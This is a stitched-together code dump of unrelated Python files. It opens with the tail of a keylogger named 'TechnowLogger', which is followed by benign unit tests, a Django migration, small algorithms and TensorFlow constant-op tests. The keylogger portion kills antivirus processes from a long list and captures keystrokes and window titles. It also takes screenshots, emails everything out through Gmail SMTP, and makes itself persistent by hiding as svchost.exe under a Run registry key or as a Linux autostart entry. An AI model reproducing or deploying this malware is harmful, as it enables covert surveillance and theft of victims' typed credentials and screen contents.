'norton_internet_secu_3.0_407.exe', 'notstart.exe', 'npf40_tw_98_nt_me_2k.exe', 'npfmessenger.exe', 'nprotect.exe', 'npscheck.exe', 'npssvc.exe', 'nsched32.exe', 'nssys32.exe', 'nstask32.exe', 'nsupdate.exe', 'nt.exe', 'ntrtscan.exe', 'ntvdm.exe', 'ntxconfig.exe', 'nui.exe', 'nupgrade.exe', 'nvarch16.exe', 'nvc95.exe', 'nvsvc32.exe', 'nwinst4.exe', 'nwservice.exe', 'nwtool16.exe', 'ollydbg.exe', 'onsrvr.exe', 'optimize.exe', 'ostronet.exe', 'otfix.exe', 'outpost.exe', 'outpostinstall.exe', 'outpostproinstall.exe', 'padmin.exe', 'panixk.exe', 'patch.exe', 'pavcl.exe', 'pavproxy.exe', 'pavsched.exe', 'pavw.exe', 'pccwin98.exe', 'pcfwallicon.exe', 'pcip10117_0.exe', 'pcscan.exe', 'pdsetup.exe', 'periscope.exe', 'persfw.exe', 'perswf.exe', 'pf2.exe', 'pfwadmin.exe', 'pgmonitr.exe', 'pingscan.exe', 'platin.exe', 'pop3trap.exe', 'poproxy.exe', 'popscan.exe', 'portdetective.exe', 'portmonitor.exe', 'powerscan.exe', 'ppinupdt.exe', 'pptbc.exe', 'ppvstop.exe', 'prizesurfer.exe', 'prmt.exe', 'prmvr.exe', 'procdump.exe', 'processmonitor.exe', 'procexplorerv1.0.exe', 'programauditor.exe', 'proport.exe', 'protectx.exe', 'pspf.exe', 'purge.exe', 'qconsole.exe', 'qserver.exe', 'rapapp.exe', 'rav7.exe', 'rav7win.exe', 'rav8win32eng.exe', 'ray.exe', 'rb32.exe', 'rcsync.exe', 'realmon.exe', 'reged.exe', 'regedit.exe', 'regedt32.exe', 'rescue.exe', 'rescue32.exe', 'rrguard.exe', 'rshell.exe', 'rtvscan.exe', 'rtvscn95.exe', 'rulaunch.exe', 'run32dll.exe', 'rundll.exe', 'rundll16.exe', 'ruxdll32.exe', 'safeweb.exe', 'sahagent.exe', 'save.exe', 'savenow.exe', 'sbserv.exe', 'sc.exe', 'scam32.exe', 'scan32.exe', 'scan95.exe', 'scanpm.exe', 'scrscan.exe', 'serv95.exe', 'setup_flowprotector_us.exe', 'setupvameeval.exe', 'sfc.exe', 'sgssfw32.exe', 'sh.exe', 'shellspyinstall.exe', 'shn.exe', 'showbehind.exe', 'smc.exe', 'sms.exe', 'smss32.exe', 'soap.exe', 'sofi.exe', 'sperm.exe', 'spf.exe', 'sphinx.exe', 'spoler.exe', 'spoolcv.exe', 'spoolsv32.exe', 'spyxx.exe', 'srexe.exe', 'srng.exe', 'ss3edit.exe', 'ssg_4104.exe', 'ssgrate.exe', 'st2.exe', 'start.exe', 'stcloader.exe', 'supftrl.exe', 'support.exe', 'supporter5.exe', 'svc.exe', 'svchostc.exe', 'svchosts.exe', 'svshost.exe', 'sweep95.exe', 
'sweepnet.sweepsrv.sys.swnetsup.exe', 'symproxysvc.exe', 'symtray.exe', 'sysedit.exe', 'system.exe', 'system32.exe', 'sysupd.exe', 'taskmg.exe', 'taskmgr.exe', 'taskmo.exe', 'taskmon.exe', 'taumon.exe', 'tbscan.exe', 'tc.exe', 'tca.exe', 'tcm.exe', 'tds-3.exe', 'tds2-98.exe', 'tds2-nt.exe', 'teekids.exe', 'tfak.exe', 'tfak5.exe', 'tgbob.exe', 'titanin.exe', 'titaninxp.exe', 'tracert.exe', 'trickler.exe', 'trjscan.exe', 'trjsetup.exe', 'trojantrap3.exe', 'tsadbot.exe', 'tvmd.exe', 'tvtmd.exe', 'undoboot.exe', 'updat.exe', 'update.exe', 'upgrad.exe', 'utpost.exe', 'vbcmserv.exe', 'vbcons.exe', 'vbust.exe', 'vbwin9x.exe', 'vbwinntw.exe', 'vcsetup.exe', 'vet32.exe', 'vet95.exe', 'vettray.exe', 'vfsetup.exe', 'vir-help.exe', 'virusmdpersonalfirewall.exe', 'vnlan300.exe', 'vnpc3000.exe', 'vpc32.exe', 'vpc42.exe', 'vpfw30s.exe', 'vptray.exe', 'vscan40.exe', 'vscenu6.02d30.exe', 'vsched.exe', 'vsecomr.exe', 'vshwin32.exe', 'vsisetup.exe', 'vsmain.exe', 'vsmon.exe', 'vsstat.exe', 'vswin9xe.exe', 'vswinntse.exe', 'vswinperse.exe', 'w32dsm89.exe', 'w9x.exe', 'watchdog.exe', 'webdav.exe', 'webscanx.exe', 'webtrap.exe', 'wfindv32.exe', 'whoswatchingme.exe', 'wimmun32.exe', 'win-bugsfix.exe', 'win32.exe', 'win32us.exe', 'winactive.exe', 'window.exe', 'windows.exe', 'wininetd.exe', 'wininitx.exe', 'winlogin.exe', 'winmain.exe', 'winnet.exe', 'winppr32.exe', 'winrecon.exe', 'winservn.exe', 'winssk32.exe', 'winstart.exe', 'winstart001.exe', 'wintsk32.exe', 'winupdate.exe', 'wkufind.exe', 'wnad.exe', 'wnt.exe', 'wradmin.exe', 'wrctrl.exe', 'wsbgate.exe', 'wupdater.exe', 'wupdt.exe', 'wyvernworksfirewall.exe', 'xpf202en.exe', 'zapro.exe', 'zapsetup3001.exe', 'zatutor.exe', 'zonalm2601.exe', 'zonealarm.exe']
processes=os.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read()
ps=[]
for i in processes.split(" "):
if ".exe" in i:
ps.append(i.replace("K\n","").replace("\n",""))
print("[*] Killing Antivirus services on this pc")
for av in avs:
for p in ps:
if p==av:
print("[*] killing off "+av)
os.popen("TASKKILL /F /IM {}".format(p))
except Exception as e:
print("[!] Unable to Kill AV")
def append_to_log(self, string):
self.log = self.log + string
def get_system_info(self):
uname = platform.uname()
os = uname[0] + " " + uname[2] + " " + uname[3]
computer_name = uname[1]
user = getpass.getuser()
return "Operating System:\t" + os + "\nComputer Name:\t\t" + computer_name + "\nUser:\t\t\t\t" + user
def process_key_press(self, key):
current_key = ""
if self.victim_system == 'Windows':
try:
CurrentWindowName = w.GetWindowText(w.GetForegroundWindow())
if self.lastWindow != CurrentWindowName:
self.lastWindow = CurrentWindowName
current_key = f"\n\n[OnWard Data Entered In : {CurrentWindowName}]\n"
except Exception:
print("[!] Failed to Start \"Log Distinguisher Function\"")
try:
current_key += str(key.char)
except AttributeError:
if key == key.space:
current_key += " "
elif key == key.enter:
current_key += " [ENTER] "
elif key == key.backspace:
current_key += " [BACKSPACE] "
elif key == key.ctrl_l or key == key.ctrl_r:
current_key += " [CTRL] "
elif key == key.shift or key == key.shift_r:
current_key += " [SHIFT] "
elif key == key.delete:
current_key += " [DELETE] "
elif key == key.esc:
current_key += " [ESC] "
elif key == key.tab:
current_key += " [TAB] "
elif key == key.up:
current_key += " [UP] "
elif key == key.down:
current_key += " [DOWN] "
elif key == key.left:
current_key += " [LEFT] "
elif key == key.right:
current_key += " [RIGHT] "
elif key == key.cmd or key == key.cmd_r:
current_key += " [WINDOWS-KEY] "
elif key == key.f1:
current_key += " [F1] "
elif key == key.f2:
current_key += " [F2] "
elif key == key.f3:
current_key += " [F3] "
elif key == key.f4:
current_key += " [F4] "
elif key == key.f5:
current_key += " [F5] "
elif key == key.f6:
current_key += " [F6] "
elif key == key.f7:
current_key += " [F7] "
elif key == key.f8:
current_key += " [F8] "
elif key == key.f9:
current_key += " [F9] "
elif key == key.f10:
current_key += " [F10] "
elif key == key.f11:
current_key += " [F11] "
elif key == key.f12:
current_key += " [F12] "
elif key == key.alt_l or key == key.alt_r:
current_key += " [ALT] "
elif key == key.caps_lock:
current_key += " [CAPSLOCK] "
elif key == key.home:
current_key += " [HOME] "
else:
current_key += " " + str(key) + " "
self.append_to_log(current_key)
def report(self):
self.send_mail(self.log)
self.log = ""
self.take_screenshot()
self.send_mail_with_attachment(files= [self.temp_screenshot])
timer = threading.Timer(self.interval, self.report)
timer.start()
def take_screenshot(self):
try:
os.remove('screenshot.png')
except Exception as e:
pass
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
with mss() as screenshot:
screenshot.shot(output="screenshot.png")
def send_mail(self, message):
try:
message = "Subject: TechnowLogger Reporting\n\n" + "Report From:\n\n" + self.system_info + "\n\nLogs:\n" + message
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(self.email, self.password)
server.sendmail(self.email, self.email, message)
server.quit()
except Exception as e:
time.sleep(15)
self.send_mail(self.log)
def send_mail_with_attachment(self, files= None):
try:
msg = MIMEMultipart()
msg['From'] = self.email
msg['To'] = self.email
msg['Subject'] = "TechnowLogger Reporting With Screenshot Attachments"
text = "\nReport From:\n\n" + self.system_info
msg.attach(MIMEText(text))
for f in files or []:
with open(f, "rb") as fil:
ext = f.split('.')[-1:]
attachedfile = MIMEApplication(fil.read(), _subtype = ext)
attachedfile.add_header(
'content-disposition', 'attachment', filename=basename(f) )
msg.attach(attachedfile)
smtp = smtplib.SMTP(host="smtp.gmail.com", port= 587)
smtp.starttls()
smtp.login(self.email, self.password)
smtp.sendmail(self.email, self.email, msg.as_string())
smtp.close()
except Exception as e:
time.sleep(15)
self.take_screenshot()
self.send_mail_with_attachment(files= [self.temp_screenshot])
def start(self):
keyboard_listener = pynput.keyboard.Listener(on_press=self.process_key_press)
with keyboard_listener:
self.report()
keyboard_listener.join()
def become_persistent(self, time_persistent):
if sys.platform.startswith("win"):
self.become_persistent_on_windows(time_persistent)
elif sys.platform.startswith("linux"):
self.become_persistent_on_linux(time_persistent)
def become_persistent_on_windows(self, time_persistent):
evil_file_location = os.environ["appdata"] + "\\svchost.exe"
if not os.path.exists(evil_file_location):
time.sleep(time_persistent)
self.log = "** TechNowlogger started on Windows System ** "
shutil.copyfile(sys.executable, evil_file_location)
subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v svchost /t REG_SZ /d "' + evil_file_location + '"', shell=True)
def become_persistent_on_linux(self, time_persistent):
home_config_directory = os.path.expanduser('~') + "/.config/"
autostart_path = home_config_directory + "/autostart/"
autostart_file = autostart_path + "xinput.desktop"
if not os.path.isfile(autostart_file):
time.sleep(time_persistent)
self.log = "** TechNowlogger started On Linux System **"
try:
os.makedirs(autostart_path)
except OSError:
pass
destination_file = home_config_directory + "xnput"
shutil.copyfile(sys.executable, destination_file)
self.chmod_to_exec(destination_file)
with open(autostart_file, 'w') as out:
out.write("[Desktop Entry]\nType=Application\nX-GNOME-Autostart-enabled=true\n")
out.write("Name=Xinput\nExec=" + destination_file + "\n")
self.chmod_to_exec(autostart_file)
subprocess.Popen(destination_file)
sys.exit()
def chmod_to_exec(self, file):
os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC) |
py | b40b46a90689111f30f3e8a49c4567bc46b82266 | import unittest
from uuid import (
UUID,
)
from minos.aggregate import (
Aggregate,
)
from minos.common import (
NotProvidedException,
)
from tests.utils import (
CONFIG_FILE_PATH,
AggregateTestCase,
Order,
OrderAggregate,
)
class TestAggregate(AggregateTestCase):
async def test_root(self):
async with OrderAggregate.from_config(CONFIG_FILE_PATH) as aggregate:
self.assertEqual(Order, aggregate.root)
def test_root_raises(self):
with self.assertRaises(TypeError):
Aggregate.from_config(CONFIG_FILE_PATH)
async def test_from_config(self):
async with OrderAggregate.from_config(CONFIG_FILE_PATH) as aggregate:
self.assertEqual(self.transaction_repository, aggregate.transaction_repository)
self.assertEqual(self.event_repository, aggregate.event_repository)
self.assertEqual(self.snapshot_repository, aggregate.snapshot_repository)
def test_from_config_raises(self):
with self.assertRaises(NotProvidedException):
OrderAggregate.from_config(CONFIG_FILE_PATH, transaction_repository=None)
with self.assertRaises(NotProvidedException):
OrderAggregate.from_config(CONFIG_FILE_PATH, event_repository=None)
with self.assertRaises(NotProvidedException):
OrderAggregate.from_config(CONFIG_FILE_PATH, snapshot_repository=None)
async def test_call(self):
async with OrderAggregate.from_config(CONFIG_FILE_PATH) as aggregate:
uuid = await aggregate.create_order()
self.assertIsInstance(uuid, UUID)
if __name__ == "__main__":
unittest.main()
|
py | b40b472912d4bb3c82128e0eeef1fd7244b90be2 | # Generated by Django 3.0.7 on 2020-07-16 09:15
import annoying.fields
from django.conf import settings
from django.db import migrations
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
("api", "0036_auto_20200716_1021"),
]
operations = [
migrations.AlterField(
model_name="elo",
name="player",
field=annoying.fields.AutoOneToOneField(
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="elo",
to=settings.AUTH_USER_MODEL,
),
),
]
|
py | b40b473733680a5ecd2271227276ef3a269594aa | def quicksort(self, nums):
if len(nums) <= 1:
return nums
pivot = nums[len(nums) // 2]
lt = [v for v in nums if v < pivot]
eq = [v for v in nums if v == pivot]
gt = [v for v in nums if v > pivot]
return self.quicksort(lt) + eq + self.quicksort(gt)
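# a minimal usage sketch (hypothetical harness, not part of the original file):
# the `self` parameter, used for the recursive calls, suggests this was lifted
# from a class, so bind it before calling, e.g.
#
# class Sorter:
#     quicksort = quicksort
#
# print(Sorter().quicksort([3, 6, 1, 2]))  # -> [1, 2, 3, 6]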
|
py | b40b48dcf044ee0e781891bc7d373608eb3e502c | #!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
SPELL=u'yǒngquán'
CN=u'涌泉'
NAME=u'yongquan32'
CHANNEL='kidney'
CHANNEL_FULLNAME='KidneyChannelofFoot-Shaoyin'
SEQ='KI1'
if __name__ == '__main__':
pass
|
py | b40b4992146732e720b6992b287583b9adb32e3b | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 - 2020 Tuhinshubhra
# BrowserCMS version detection
# Rev 1
import cmseekdb.basic as cmseek
import re
def start(ga_content):
ga_content = ga_content.lower()
regex = re.findall(r'browsercms (.*)', ga_content)
if regex != []:
version = regex[0]
cmseek.success('BrowserCMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected')
return version
else:
cmseek.error('Version detection failed!')
return '0'
|
py | b40b4a68c3823373b00ddbd574147b4424abee6c | def get_proba(w, h, W, H):
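# memoized recursion over a W x H grid: probas[w][h] caches the value for cell
# (w, h); interior cells average the right (w + 1) and down (h + 1) neighbours
# with weight 0.5 each, while edge cells follow the only available direction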
proba = probas[w][h]
if proba is not None:
return proba
elif w == W - 1:
proba = get_proba(w, h + 1, W, H)
probas[w][h] = proba
return proba
elif h == H - 1:
proba = get_proba(w + 1, h, W, H)
probas[w][h] = proba
return proba
else:
proba = 0.5 * get_proba(w, h + 1, W, H) + \
0.5 * get_proba(w + 1, h, W, H)
probas[w][h] = proba
return proba
T = int(input())
for t in range(T):
[W, H, L, U, R, D] = list(map(int, input().split(' ')))
global probas
probas = [[None] * H for _ in range(W)]
for i in range(W):
for j in range(H):
if i >= R or j >= D:
probas[i][j] = 1
elif i >= L - 1 and j >= U - 1:
probas[i][j] = 0
print("Case #{}: {}".format(t + 1, get_proba(0, 0, W, H)))
|
py | b40b4b429a9c0ac7522b21daff3ec8c768f3bc33 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for ConstantOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
class ConstantTest(test.TestCase):
def _testCpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=False):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testGpu(self, x):
np_ans = np.array(x)
with self.test_session(use_gpu=True):
tf_ans = ops.convert_to_tensor(x).eval()
if np_ans.dtype in [np.float32, np.float64, np.complex64, np.complex128]:
self.assertAllClose(np_ans, tf_ans)
else:
self.assertAllEqual(np_ans, tf_ans)
def _testAll(self, x):
self._testCpu(x)
self._testGpu(x)
def testFloat(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float32))
self._testAll(np.empty((2, 0, 5)).astype(np.float32))
def testDouble(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float64))
self._testAll(
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.float64))
self._testAll(np.empty((2, 0, 5)).astype(np.float64))
def testInt32(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int32))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int32))
self._testAll(np.empty((2, 0, 5)).astype(np.int32))
def testInt64(self):
self._testAll(np.arange(-15, 15).reshape([2, 3, 5]).astype(np.int64))
self._testAll((100 * np.random.normal(size=30)).reshape([2, 3, 5]).astype(
np.int64))
self._testAll(np.empty((2, 0, 5)).astype(np.int64))
def testComplex64(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex64))
self._testAll(np.empty((2, 0, 5)).astype(np.complex64))
def testComplex128(self):
self._testAll(
np.complex(1, 2) *
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(
np.complex(1, 2) *
np.random.normal(size=30).reshape([2, 3, 5]).astype(np.complex128))
self._testAll(np.empty((2, 0, 5)).astype(np.complex128))
def testString(self):
self._testCpu(
np.array([compat.as_bytes(str(x)) for x in np.arange(-15, 15)]).reshape(
[2, 3, 5]))
self._testCpu(np.empty((2, 0, 5)).astype(np.str_))
def testStringWithNulls(self):
with self.test_session():
val = ops.convert_to_tensor(b"\0\0\0\0").eval()
self.assertEqual(len(val), 4)
self.assertEqual(val, b"\0\0\0\0")
with self.test_session():
val = ops.convert_to_tensor(b"xx\0xx").eval()
self.assertEqual(len(val), 5)
self.assertAllEqual(val, b"xx\0xx")
nested = [[b"\0\0\0\0", b"xx\0xx"], [b"\0_\0_\0_\0", b"\0"]]
with self.test_session():
val = ops.convert_to_tensor(nested).eval()
# NOTE(mrry): Do not use assertAllEqual, because it converts nested to a
# numpy array, which loses the null terminators.
self.assertEqual(val.tolist(), nested)
def testExplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32),
shape=[2, 3, 5])
self.assertEqual(c.get_shape(), [2, 3, 5])
def testImplicitShapeNumPy(self):
with ops.Graph().as_default():
c = constant_op.constant(
np.arange(-15, 15).reshape([2, 3, 5]).astype(np.float32))
self.assertEqual(c.get_shape(), [2, 3, 5])
def testExplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[7])
self.assertEqual(c.get_shape(), [7])
def testImplicitShapeList(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7])
self.assertEqual(c.get_shape(), [7])
def testExplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1, shape=[1])
self.assertEqual(c.get_shape(), [1])
def testImplicitShapeNumber(self):
with ops.Graph().as_default():
c = constant_op.constant(1)
self.assertEqual(c.get_shape(), [])
def testShapeInconsistent(self):
with ops.Graph().as_default():
c = constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[10])
self.assertEqual(c.get_shape(), [10])
# pylint: disable=g-long-lambda
def testShapeWrong(self):
with ops.Graph().as_default():
with self.assertRaisesWithPredicateMatch(
ValueError,
lambda e: ("Too many elements provided. Needed at most 5, "
"but received 7" == str(e))):
constant_op.constant([1, 2, 3, 4, 5, 6, 7], shape=[5])
# pylint: enable=g-long-lambda
def testTooLargeConstant(self):
with ops.Graph().as_default():
large_array = np.zeros((512, 1024, 1024), dtype=np.float32)
with self.assertRaisesRegexp(
ValueError,
"Cannot create a tensor proto whose content is larger than 2GB."):
c = constant_op.constant(large_array)
def testTooLargeGraph(self):
with ops.Graph().as_default() as g:
large_array = np.zeros((256, 1024, 1024), dtype=np.float32)
c = constant_op.constant(large_array)
d = constant_op.constant(large_array)
with self.assertRaisesRegexp(ValueError,
"GraphDef cannot be larger than 2GB."):
g.as_graph_def()
def testSparseValuesRaiseErrors(self):
with self.assertRaisesRegexp(ValueError,
"setting an array element with a sequence"):
c = constant_op.constant([[1, 2], [3]], dtype=dtypes_lib.int32)
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3]])
with self.assertRaisesRegexp(ValueError, "must be a dense"):
c = constant_op.constant([[1, 2], [3], [4, 5]])
class AsTensorTest(test.TestCase):
def testAsTensorForTensorInput(self):
with ops.Graph().as_default():
t = constant_op.constant(10.0)
x = ops.convert_to_tensor(t)
self.assertIs(t, x)
def testAsTensorForNonTensorInput(self):
with ops.Graph().as_default():
x = ops.convert_to_tensor(10.0)
self.assertTrue(isinstance(x, ops.Tensor))
def testAsTensorForShapeInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([], x.eval())
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3]))
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual([1, 2, 3], x.eval())
x = array_ops.reshape(
array_ops.zeros([6]), tensor_shape.TensorShape([2, 3]))
self.assertAllEqual([[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]], x.eval())
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape(None))
with self.assertRaisesRegexp(ValueError, "partially known"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64]))
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3]), dtype=dtypes_lib.float32)
def testAsTensorForDimensionInput(self):
with self.test_session():
x = ops.convert_to_tensor(tensor_shape.TensorShape([1, 2, 3])[1])
self.assertEqual(dtypes_lib.int32, x.dtype)
self.assertAllEqual(2, x.eval())
x = ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.int64)
self.assertEqual(dtypes_lib.int64, x.dtype)
self.assertAllEqual(2, x.eval())
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape(None)[1])
with self.assertRaisesRegexp(ValueError, "unknown Dimension"):
ops.convert_to_tensor(tensor_shape.TensorShape([1, None, 64])[1])
with self.assertRaises(TypeError):
ops.convert_to_tensor(
tensor_shape.TensorShape([1, 2, 3])[1], dtype=dtypes_lib.float32)
class IdentityOpTest(test.TestCase):
def testIdTensor(self):
with ops.Graph().as_default():
x = constant_op.constant(2.0, shape=[6], name="input")
id_op = array_ops.identity(x, name="id")
self.assertTrue(isinstance(id_op.op.inputs[0], ops.Tensor))
self.assertProtoEquals("name: 'id' op: 'Identity' input: 'input' "
"attr { key: 'T' value { type: DT_FLOAT } }",
id_op.op.node_def)
class ZerosTest(test.TestCase):
def _Zeros(self, shape):
with self.test_session():
ret = array_ops.zeros(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(
np.array_equal(self._Zeros([2, 3]), np.array([[0] * 3] * 2)))
def testScalar(self):
self.assertEqual(0, self._Zeros([]))
self.assertEqual(0, self._Zeros(()))
with self.test_session():
scalar = array_ops.zeros(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(0, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[0] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of zeros of the same dimensions as "d".
z = array_ops.zeros(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.zeros([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
# Test explicit type control
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64,
dtypes_lib.bool
]:
z = array_ops.zeros([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
z = array_ops.zeros(array_ops.shape(d), dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.zeros([2, 3]))
class ZerosLikeTest(test.TestCase):
def _compareZeros(self, dtype, use_gpu):
with self.test_session(use_gpu=use_gpu):
# Creates a tensor of non-zero values with shape 2 x 3.
numpy_dtype = dtype.as_numpy_dtype
d = constant_op.constant(np.ones((2, 3), dtype=numpy_dtype), dtype=dtype)
# Constructs a tensor of zeros of the same dimensions and type as "d".
z_var = array_ops.zeros_like(d)
# Test that the type is correct
self.assertEqual(z_var.dtype, dtype)
z_value = z_var.eval()
# Test that the value is correct
self.assertTrue(np.array_equal(z_value, np.array([[0] * 3] * 2)))
self.assertEqual([2, 3], z_var.get_shape())
def testZerosLikeCPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128, dtypes_lib.int64
]:
self._compareZeros(dtype, False)
def testZerosLikeGPU(self):
for dtype in [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.bool, dtypes_lib.int64
]:
self._compareZeros(dtype, True)
def testZerosLikePartialShape(self):
d = array_ops.placeholder(dtypes_lib.float32, shape=[None, 4, None])
z = array_ops.zeros_like(d)
self.assertEqual(d.get_shape().as_list(), z.get_shape().as_list())
def testZerosLikeDtype(self):
# Make sure zeros_like works even for dtypes that cannot be cast between
with self.test_session():
shape = (3, 5)
dtypes = np.float32, np.complex64
for in_type in dtypes:
x = np.arange(15).astype(in_type).reshape(*shape)
for out_type in dtypes:
y = array_ops.zeros_like(x, dtype=out_type).eval()
self.assertEqual(y.dtype, out_type)
self.assertEqual(y.shape, shape)
self.assertAllEqual(y, np.zeros(shape, dtype=out_type))
class OnesTest(test.TestCase):
def _Ones(self, shape):
with self.test_session():
ret = array_ops.ones(shape)
self.assertEqual(shape, ret.get_shape())
return ret.eval()
def testConst(self):
self.assertTrue(np.array_equal(self._Ones([2, 3]), np.array([[1] * 3] * 2)))
def testScalar(self):
self.assertEqual(1, self._Ones([]))
self.assertEqual(1, self._Ones(()))
with self.test_session():
scalar = array_ops.ones(constant_op.constant([], dtype=dtypes_lib.int32))
self.assertEqual(1, scalar.eval())
def testDynamicSizes(self):
np_ans = np.array([[1] * 3] * 2)
with self.test_session():
# Creates a tensor of 2 x 3.
d = array_ops.fill([2, 3], 12., name="fill")
# Constructs a tensor of ones of the same dimensions as "d".
z = array_ops.ones(array_ops.shape(d))
out = z.eval()
self.assertAllEqual(np_ans, out)
self.assertShapeEqual(np_ans, d)
self.assertShapeEqual(np_ans, z)
def testAutoPack(self):
with self.test_session():
h = array_ops.placeholder(dtypes_lib.int32, shape=[])
w = array_ops.placeholder(dtypes_lib.int32, shape=[])
z = array_ops.ones([h, w])
out = z.eval(feed_dict={h: 4, w: 16})
self.assertAllEqual(out, np.array([[1] * 16] * 4))
def testDtype(self):
with self.test_session():
d = array_ops.fill([2, 3], 12., name="fill")
self.assertEqual(d.get_shape(), [2, 3])
# Test default type for both constant size and dynamic size
z = array_ops.ones([2, 3])
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
z = array_ops.ones(array_ops.shape(d))
self.assertEqual(z.dtype, dtypes_lib.float32)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
# Test explicit type control
for dtype in (dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
dtypes_lib.uint8, dtypes_lib.int16, dtypes_lib.int8,
dtypes_lib.complex64, dtypes_lib.complex128,
dtypes_lib.int64, dtypes_lib.bool):
z = array_ops.ones([2, 3], dtype=dtype)
self.assertEqual(z.dtype, dtype)
self.assertEqual([2, 3], z.get_shape())
self.assertAllEqual(z.eval(), np.ones([2, 3]))
